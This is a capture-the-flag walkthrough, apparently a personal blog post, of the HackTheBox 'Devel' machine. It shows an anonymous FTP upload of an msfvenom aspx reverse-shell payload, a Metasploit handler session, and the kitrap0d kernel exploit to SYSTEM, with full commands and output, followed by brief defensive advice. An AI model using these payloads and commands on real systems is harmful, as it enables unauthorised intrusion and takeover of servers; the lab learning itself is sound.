This is my second box in HackTheBox. There are probably a couple of different ways to exploit this but I went with the FTP path as FTP is known to be vulnerable. Maybe later in time, I will come back and try to exploit it using HTTP (if at all possible). We first exploit a vulnerability that gives us user access. As user, we are able to exploit another privilege escalation vulnerability that allows us to become system.
Table of Contents
Reconnaissance
We’ll start with checking which open ports are available to us.
$ nmap -A -T4 -p- 10.10.10.5We get the following output.
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 02:06AM <DIR> aspnet_client
| 03-17-17 05:37PM 689 iisstart.htm
|_03-17-17 05:37PM 184946 welcome.png
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsWe see that we have anonymous FTP login allowed and HTTP that allows for trace. We also see the specific HTTP server being used.
Enumeration
Since we have anonymous logon enabled via FTP. That would be a low hanging fruit to start with.
FTP
Let’s try login using the username and password anonymous.
$ ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:badmin): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp>And we are in. Let’s just verify whether or not we can read files / put files into the server.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection.
03-18-17 02:06AM <DIR> aspnet_client
03-17-17 05:37PM 689 iisstart.htm
03-17-17 05:37PM 184946 welcome.png
226 Transfer complete.
ftp> put test.txt
local: test.txt remote: test.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.Exploitation
FTP
Let’s generate a payload using msfvenom that is specific for asp.
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.6 LPORT=4444 -f aspx > example.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of aspx file: 2896 bytes
$ ls example.aspx
example.aspxThe file *example.aspx* is generated in the same folder.
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.14.6
LHOST => 10.10.14.6
msf6 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.14.6 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard TargetLet’s run this.
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.6:4444 We see that the listener is on so let’s switch back to ftp and transfer that file to the server.
ftp> put example.aspx
local: example.aspx remote: example.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
2933 bytes sent in 0.00 secs (1.2526 MB/s)Let’s access that malware and make the server execute it by navigating to [http://10.10.10.5/example.aspx].
From the listener, we see that we got a session
[*] Sending stage (175174 bytes) to 10.10.10.5
[*] Meterpreter session 1 opened (10.10.14.6:4444 -> 10.10.10.5:49158) at 2021-06-24 08:51:04 +0100
meterpreter > When we verify the system details and user id, we see that we have no authority as we are not system user.
meterpreter > sysinfo
Computer : DEVEL
OS : Windows 7 (6.1 Build 7600).
Architecture : x86
System Language : el_GR
Domain : HTB
Logged On Users : 0
Meterpreter : x86/windows
meterpreter > getuid
Server username: IIS APPPOOL\WebPrivilege Escalation
Since we have access now, we can use post modules to try and escalate privileges. We can see form the available suggestions that there is only one module that we can use now.
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > search suggester
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester
Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggesterLet’s go ahead and use that module. The options require that we set the session number we want to interact with.
msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.5 - Collecting local exploits for x86/windows...Once we run the module, we see a couple of exploits that we could use in this case.
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
nil versions are discouraged and will be deprecated in Rubygems 4
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completedWe’ll go with ms10_015_kitrap0d which is a vulnerability of the Windows Kernel from 2010 that allows for privilege escalation. In addition to the session details, we need to specify our IP address that maps to the tunnel 0 interface.
msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms10_015_kitrap0d
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms10_015_kitrap0d) > options
Module options (exploit/windows/local/ms10_015_kitrap0d):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.176.95 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 2K SP4 - Windows 7 (x86)
msf6 exploit(windows/local/ms10_015_kitrap0d) > set session 2
session => 2
Exploit target:
Id Name
-- ----
0 Windows 2K SP4 - Windows 7 (x86)
msf6 exploit(windows/local/ms10_015_kitrap0d) > set LHOST 10.10.14.6
LHOST => 10.10.14.6Everything is set now. Let’s run the module.
msf6 exploit(windows/local/ms10_015_kitrap0d) > run
[*] Started reverse TCP handler on 10.10.14.6:4444
[*] Launching notepad to host the exploit...
[+] Process 632 launched.
[*] Reflectively injecting the exploit DLL into 632...
[*] Injecting exploit into 632 ...
[*] Exploit injected. Injecting payload into 632...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (175174 bytes) to 10.10.10.5
[*] Meterpreter session 3 opened (10.10.14.6:4444 -> 10.10.10.5:49163) at 2021-06-24 09:02:56 +0100We now have a session with the system and this time round, we are logged in as user SYSTEM.
meterpreter > sysinfo
Computer : DEVEL
OS : Windows 7 (6.1 Build 7600).
Architecture : x86
System Language : el_GR
Domain : HTB
Logged On Users : 0
Meterpreter : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEMPost Exploitation
Let’s drop down to the shell to interact with the Windows machine.
meterpreter > shell
Process 1024 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv> cd ../../..
cd ../../..Let’s see which users are available for us. We see we have Administrator and babis.
c:\>cd Users
cd Users
c:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is 8620-71F1
Directory of c:\Users
18/03/2017 02:16 �� <DIR> .
18/03/2017 02:16 �� <DIR> ..
18/03/2017 02:16 �� <DIR> Administrator
17/03/2017 05:17 �� <DIR> babis
18/03/2017 02:06 �� <DIR> Classic .NET AppPool
14/07/2009 10:20 �� <DIR> Public
0 File(s) 0 bytes
6 Dir(s) 22.198.059.008 bytes freeUser Flag
The user flag is normally located on a desktop of a normal user (C:\Documents and Settings\User\Desktop). In this case, we need to traverse to the desktop of user “babis”. Once in the directory, we see the “user.txt.txt” file which we can read the contents of using the “type” command.
c:\Users\babis>cd Desktop
cd Desktop
c:\Users\babis\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 8620-71F1
Directory of c:\Users\babis\Desktop
18/03/2017 02:14 �� <DIR> .
18/03/2017 02:14 �� <DIR> ..
18/03/2017 02:18 �� 32 user.txt.txt
1 File(s) 32 bytes
2 Dir(s) 22.197.534.720 bytes free
c:\Users\babis\Desktop>type user.txt.txt
type user.txt.txt
9ecddXXXXXXXXXXXXXXf4cb3e8Root flag
The root flag is normally located on a desktop of Administrator (C:\Documents and Settings\Administrator\Desktop). Once in the directory, we see the “root.txt” file which we can read the contents of using the “type” command.
c:\Users\babis\Desktop>cd ../../
cd ../../
c:\Users>cd Administrator
cd Administrator
c:\Users\Administrator>cd Desktop
cd Desktop
c:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 8620-71F1
Directory of c:\Users\Administrator\Desktop
14/01/2021 12:42 �� <DIR> .
14/01/2021 12:42 �� <DIR> ..
18/03/2017 02:17 �� 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 22.190.256.128 bytes free
c:\Users\Administrator\Desktop>type root.txt
type root.txt
e621a0XXXXXXXXXXXXXXXbc72b4bDefender’s Note
- FTP is a very insecure protocol as it sends traffic in clear text. Opt for more secure versions such as SFTP, FTPS and the likes.
- If you have to use FTP, disable anonymous login for FTP server.
- Patch systems in a timely manner.
CyberSecFaith 